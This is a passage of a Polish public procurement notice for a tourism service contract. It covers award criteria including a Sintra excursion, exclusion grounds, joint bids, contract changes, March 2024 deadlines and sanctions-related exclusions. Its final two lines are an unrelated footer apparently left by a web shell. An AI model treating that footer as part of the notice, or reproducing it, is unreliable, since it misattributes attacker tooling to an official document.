Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Organizacja dodatkowej wycieczki do Sintry</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu z postępowania na podstawie art. 108 ust. 1 oraz art. 109 ust. 1 pkt. 4), 5), 7), 8) i 10) ustawy Pzp oraz spełniają określone przez Zamawiającego warunki udziału w postępowaniu. <br/>2.	Wykonawcy muszą spełnić następujące warunki udziału w postępowaniu:<br/>2.1.	Zdolności do występowania w obrocie gospodarczym:<br/>- Zamawiający nie określa w/w warunku udziału w postępowaniu. <br/>2.2.	Uprawnień do prowadzenia w danym zakresie określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów: <br/>-	Zamawiający uzna warunek za spełniony, jeśli Wykonawca posiada wpis do rejestru organizatorów turystyki i przedsiębiorców ułatwiających nabywanie powiązanych usług turystycznych kub bycie organizatorem turystyki lub przedsiębiorcą ułatwiającym nabywanie powiązanych usług turystycznych, o których mowa w art. 8 ust. 1 i 2 ustawy z dnia 24 listopada 2017 r. o imprezach turystycznych i powiązanych usługach turystycznych. <br/>2.3.	Sytuacji ekonomicznej lub finansowej:<br/>- Zamawiający nie określa w/w warunku udziału w postępowaniu.<br/>2.4.	Zdolności technicznej lub zawodowej:<br/>- Zamawiający nie określa w/w warunku udziału w postępowaniu. <br/>3.	Zamawiający zgodnie z art. 116 ust. 2 ustawy Pzp, w odniesieniu do zdolności technicznej lub zawodowej może uznać na każdym etapie postępowania, że Wykonawca nie posiada wymaganych zdolności, jeżeli posiadanie przez Wykonawcę sprzecznych interesów, w szczególności zaangażowanie zasobów technicznych lub zawodowych Wykonawcy w inne przedsięwzięcia gospodarcze może mieć negatywny wpływ <br/>na realizację zamówienia. <br/>4.	Zamawiający informuje, że w przedmiotowym postępowaniu nie będzie wzywał do złożenia zgodnie z art. 274 ust. 1 ustawy Pzp podmiotowych środków dowodowych. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W zakresie podmiotowych środków dowodowych potwierdzających brak podstaw do wykluczenia, w bieżącym postępowaniu Wykonawcy składają wyłączenie wraz z ofertą oświadczenie na podstawie art. 125 ustaw Pzp.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W zakresie podmiotowych środków dowodowych potwierdzających spełnianie warunków udziału w postępowaniu, w bieżącym postępowaniu Wykonawcy składają wyłączenie wraz z ofertą oświadczenie na podstawie art. 125 ustaw Pzp.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> W bieżącym postępowaniu Zamawiający nie wymaga złożenia przedmiotowych środków dowodowych. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Załącznik nr 1 oraz 1a – oświadczenie dotyczące spełnienia warunków udziału <br/>w postępowaniu<br/>Załącznik nr 2 oraz 2a - oświadczenie o niepodleganiu wykluczeniu z postępowania <br/>Załącznik nr 3 – wzór oświadczenia podmiotu udostępniającego zasoby <br/>Załącznik nr 4 – wzór oświadczenia składanego na podstawie art. 117 ust. 4 w przypadku podmiotów wspólnie ubiegających się o udzielenie zamówienia<br/>Załącznik nr 5 – projekt umowy <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 3.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. <br/>3.1.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia są zobowiązani do ustanowienia pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>3.2.	Zamawiający informuje, że wszelka korespondencja będzie prowadzona wyłącznie z ustanowionym pełnomocnikiem.<br/>3.3.	Żaden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia nie może podlegać wykluczeniu na podstawie art. 108 ust.1 oraz art. 109. Ust. 1 pkt 4), 5), 7), 8) .i 10) ustawy Pzp natomiast spełnienie warunków udziału w postępowaniu Wykonawcy mogą spełniać łącznie. <br/>3.4.	Każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia zobowiązany jest do złożenia oświadczeń w zakresie niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu (Rozdział VII pkt 1.2. SWZ).<br/>3.5.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego, na podstawie art. 117 pkt 4 ustawy Pzp zobligowani są do złożenia wraz z ofertą oświadczenie, z którego będzie wynikało, które roboty budowlane, dostawy lub usługi wykonają poszczególnie Wykonawcy – treść oświadczenia zgodnie z załącznikiem nr 4 do SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zakazuje się istotnych zmian postanowień zawartej umowy.<br/>2. Dopuszczalna jest zmiana umowy, jeżeli zachodzą okoliczności, o których mowa w art. 455 ustawy Pzp.<br/>3. Strony przewidują możliwość dokonania zmiany zawartej umowy:<br/>- w zakresie terminu wykonania przedmiotu umowy w przypadku gdy konieczność wprowadzenia zmian wynika z okoliczności trudnych do przewidzenia, przy zachowaniu należytej staranności w chwili zawarcia umowy, na które to okoliczności Strony nie miały wpływu, w tym spowodowanych działaniem osób trzecich, zmianą powszechnie obowiązujących przepisów prawa lub wynikających z prawomocnych orzeczeń lub ostatecznych aktów administracyjnych właściwych organów – w takim zakresie, w jakim będzie to niezbędne w celu dostosowania postanowień umowy do zaistniałego stanu prawnego lub faktycznego; siły wyższej (rozumianej jako wystąpienie zdarzenia nadzwyczajnego, zewnętrznego, niemożliwego do przewidzenia i zapobieżenia, którego nie dało się uniknąć nawet przy zachowaniu najwyższej staranności, a które uniemożliwia Wykonawcy wykonanie jego zobowiązania w całości lub w części) - w takim zakresie, w jakim będzie to niezbędne w celu dostosowania postanowień umowy do zaistniałego stanu prawnego lub faktycznego.<br/>- w przypadku zmiany warunków realizacji i zakresu przedmiotowego umowy niezbędne<br/>do prawidłowej realizacji zamówienia,<br/>- w związku z koniecznością zrealizowania przedmiotu umowy przy zastosowaniu innych rozwiązań ze względu na zmiany obowiązującego prawa,<br/>- zmiany w zakresie podwykonawców wskazanych w ofercie, pod warunkiem wyrażenia zgody Zamawiającego na taką zmianę,<br/>- w razie zmiany wysokości stawki VAT Strony dokonują zmiany uwzględniającej nową wysokość tej stawki,<br/>4. Warunkiem wprowadzenia zmian, o których mowa w ust. 3 jest wystąpienie przez wnioskującego o ich dokonanie w umowie do drugiej strony umowy z wnioskiem na piśmie pod rygorem nieważności zawierającym stosowne uzasadnienie dokonania zmian, niezwłocznie od powzięcia wiadomości o okolicznościach będących podstawą dokonania zmian<br/>5. Zmiany, o których mowa w ust. 3 nie będą podstawą do zwiększenia wynagrodzenia ani naliczania kar umownych.<br/>6. Zmiany umowy wymagają zachowania formy pisemnej pod rygorem nieważności, z zastrzeżeniem wyjątków przewidzianych w treści umowy.<br/>Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia opisane zostały szczegółowo we wzorze umowy stanowiącym załącznik nr 5 do SWZ. Załącznik dostępny jest na stronie internetowej prowadzonego postępowania. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-03-15 08:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-03-15 09:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-04-13</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h3 class="mb-0">8.6.) Maksymalna liczba wykonawców, którzy zostaną zaproszeni do negocjacji: <span class="normal">3</span></h3> <h3 class="mb-0">8.7) Kryteria oceny ofert, które zamawiający zamierza stosować w celu ograniczenia liczby wykonawców: </h3> Pzp).<br/>2.	Zamawiający informuje, że w celu ulepszeniu treści ofert zastrzega możliwość przeprowadzenia negocjacji w zakresie wszystkich kryteriów oceny ofert w bieżącym postępowaniu. Do negocjacji zaproszeni zostaną Wykonawcy w liczbie nie mniejszej niż 3, spośród Wykonawców których oferty nie zostały odrzucone, spełniają warunki udziału w postępowaniu oraz otrzymały najwyższą ilość punktów w oparciu o ustalone kryteria oceny ofert. <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 11. UWAGA dla Wykonawców w związku z działaniami Rosji destabilizującymi sytuację<br/>na Ukrainie:<br/>11.1. Zamawiający informuje, że na podstawie art. 5k Rozporządzenia Rady (UE) 2022/576 z dnia 8 kwietnia 2022 r. w sprawie zmiany rozporządzenia (UE) nr 833/2014 dotyczącego środków ograniczających w związku z działaniami Rosji destabilizującymi sytuację na Ukrainie ( Dz. Urz. UE L 2022, Nr 111, str. 1) oraz art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. w celu przeciwdziałania wspieraniu agresji Federacji Rosyjskiej na Ukrainę rozpoczętej w dniu 24 lutego 2022 r. (Dz. U. z 2023 r. poz. 1479), zwana dalej „ustawą sankcyjną” z postępowania o udzielenie zamówienia publicznego wyklucza się:<br/>a) wykonawcę oraz uczestnika konkursu wymienionego w wykazach określonych<br/>w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisanego na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt. 3 ustawy sankcyjnej;<br/>b) wykonawcę oraz uczestnika konkursu, którego beneficjentem rzeczywistym<br/>w rozumieniu ustawy z dnia 1 marca 2018 r. o przeciwdziałaniu praniu pieniędzy oraz finansowaniu terroryzmu (Dz. U. z 2023 r. poz. 1124) jest osoba wymieniona<br/>w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisana na listę lub będąca takim beneficjentem rzeczywistym od dnia 24 lutego 2022 r., o ile została wpisana na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt. 3 ustawy sankcyjnej;<br/>c) wykonawcę oraz uczestnika konkursu, którego jednostką dominującą<br/>w rozumieniu art. 3 ust. 1 pkt. 37 ustawy z dnia 29 września 1994 r.<br/>o rachunkowości (Dz. U. z 2023 r. poz. 120), jest podmiot wymieniony<br/>w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisany na listę lub będący taką jednostką dominującą od dnia 24 lutego 2022 r., o ile został wpisany na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt. 3 ustawy sankcyjnej.<br/>11.2. W celu potwierdzenia braku okoliczności, o których mowa w pkt. 11.1. Zamawiający informuje, iż zastrzega możliwość samodzielnego badania ogólnodostępnych rejestrów, w tym Centralnej Ewidencji i Informacji o Działalności Gospodarczej, Krajowego Rejestru Sądowego oraz Centralnego Rejestru Beneficjentów Rzeczywistych.<br/>11.3. W uzasadnionych przypadkach Zamawiający będzie żądał innych koniecznych dokumentów i oświadczeń, w szczególności poświadczonego przez wykonawcę za zgodność z oryginałem wyciągu z księgi udziałów lub rejestru akcji.<br/>11.4. W celu potwierdzenia istnienia okoliczności, o których mowa w pkt. 11.1. Wykonawcy zagraniczni będą zobowiązani do przedkładania dokumentów<br/>z odpowiedniego rejestru, takiego jak rejestr sądowy albo, w przypadku braku takiego rejestru, inny równoważny dokument wydany przez właściwy organ sądowy lub administracyjny kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania wraz z tłumaczeniem na język polski.

Creat By MiNi SheLL
Email: jattceo@gmail.com